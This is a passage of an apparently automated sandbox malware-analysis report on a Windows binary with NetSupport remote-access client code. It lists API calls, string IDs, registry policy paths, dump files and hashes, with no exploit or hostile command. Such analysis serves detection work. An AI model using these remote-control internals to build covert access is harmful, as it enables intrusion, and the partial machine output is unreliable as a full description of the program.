                                                                                        • Part of subcall function 1110F2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                        • Part of subcall function 1110F2B0: CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                      • GetStockObject.GDI32(0000000D), ref: 11108EDF
                                                                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 11108EEF
                                                                                      • InitializeCriticalSection.KERNEL32(0000003C), ref: 11108F0B
                                                                                      • InitializeCriticalSection.KERNEL32(111F060C), ref: 11108F16
                                                                                        • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                        • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                      • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108F59
                                                                                        • Part of subcall function 1109E9E0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                        • Part of subcall function 1109E9E0: OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                        • Part of subcall function 1109E9E0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                      • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FAA
                                                                                      • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FFF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                                                      • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                      • API String ID: 3930710499-403456261
                                                                                      • Opcode ID: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                      • Instruction ID: 229803012459fbbe5cfd3a30b02a894d1af5bad55287ed163187595495ff030c
                                                                                      • Opcode Fuzzy Hash: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                      • Instruction Fuzzy Hash: DC81AFB4E0435AEFEB55DFB48C89B9AFBE9AB48308F00457DE569D7280E7309944CB11
                                                                                      Function 110281A0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1
                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                      • wsprintfA.USER32 ref: 11028214
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
                                                                                      • wsprintfA.USER32 ref: 11028291
                                                                                      • CloseHandle.KERNEL32(?), ref: 110282A7
                                                                                      • CloseHandle.KERNEL32(?), ref: 110282B0
                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                      • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                      • API String ID: 512045693-419896573
                                                                                      • Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                      • Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
                                                                                      • Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                      • Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0
                                                                                      Function 11085E10 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(PCIINV.DLL,4012B9B4,03006E50,03006E40,?,00000000,1118276C,000000FF,?,11031942,03006E50,00000000,?,?,?), ref: 11085E45
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                      • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
                                                                                      • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
                                                                                      • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
                                                                                      • wsprintfA.USER32 ref: 11085F1B
                                                                                      • wsprintfA.USER32 ref: 11085F32
                                                                                      • wsprintfA.USER32 ref: 11085F49
                                                                                      • CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A
                                                                                        • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,03006E50,00000000,?,?,?), ref: 11085A98
                                                                                        • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,03006E50,00000000,?,?,?), ref: 11085AAB
                                                                                        • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,03006E50,00000000,?,?,?), ref: 11085ABE
                                                                                        • Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,110860C0,?,11031942,03006E50,00000000,?,?,?), ref: 11085AD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                      • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                      • API String ID: 4263811268-2492245516
                                                                                      • Opcode ID: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                      • Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
                                                                                      • Opcode Fuzzy Hash: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                      • Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95
                                                                                      Function 110304B8 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
                                                                                      • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
                                                                                      • SetLastError.KERNEL32(00000078), ref: 110306C2
                                                                                      • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                      • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                      • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                      • API String ID: 2061479752-1320826866
                                                                                      • Opcode ID: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                      • Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
                                                                                      • Opcode Fuzzy Hash: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                      • Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51
                                                                                      Function 1102C410 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 238synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
                                                                                      • GetTickCount.KERNEL32 ref: 1102C47A
                                                                                        • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                      • GetTickCount.KERNEL32 ref: 1102C574
                                                                                        • Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                        • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
                                                                                      • CloseHandle.KERNEL32(?), ref: 1102C688
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                      • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp$
                                                                                      • API String ID: 596640303-1015715393
                                                                                      • Opcode ID: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                      • Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
                                                                                      • Opcode Fuzzy Hash: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                      • Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61
                                                                                      Function 11061700 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
                                                                                        • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                        • Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 11061881
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Enum$Open$CloseValue
                                                                                      • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                      • API String ID: 2823542970-1528906934
                                                                                      • Opcode ID: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                      • Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
                                                                                      • Opcode Fuzzy Hash: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                      • Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1
                                                                                      Function 11137630 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • GetTickCount.KERNEL32 ref: 11137692
                                                                                        • Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
                                                                                        • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                        • Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                        • Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                      • GetTickCount.KERNEL32 ref: 111376A1
                                                                                      • _memset.LIBCMT ref: 111376E3
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
                                                                                      • _strrchr.LIBCMT ref: 11137708
                                                                                      • _free.LIBCMT ref: 1113775A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                      • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                      • API String ID: 711243594-1270230032
                                                                                      • Opcode ID: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                      • Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
                                                                                      • Opcode Fuzzy Hash: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                      • Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1
                                                                                      Function 11133E80 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                        • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                        • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                        • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                        • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                        • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                      • AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
                                                                                      • LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
                                                                                      • GetSystemMetrics.USER32(00000021), ref: 11133EE9
                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 11133EF1
                                                                                      • GetSystemMetrics.USER32(00000004), ref: 11133EF7
                                                                                      • GetDC.USER32(00000000), ref: 11133F03
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
                                                                                      • CreateWindowExA.USER32(00000001,NSMWClass,02FF0900,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
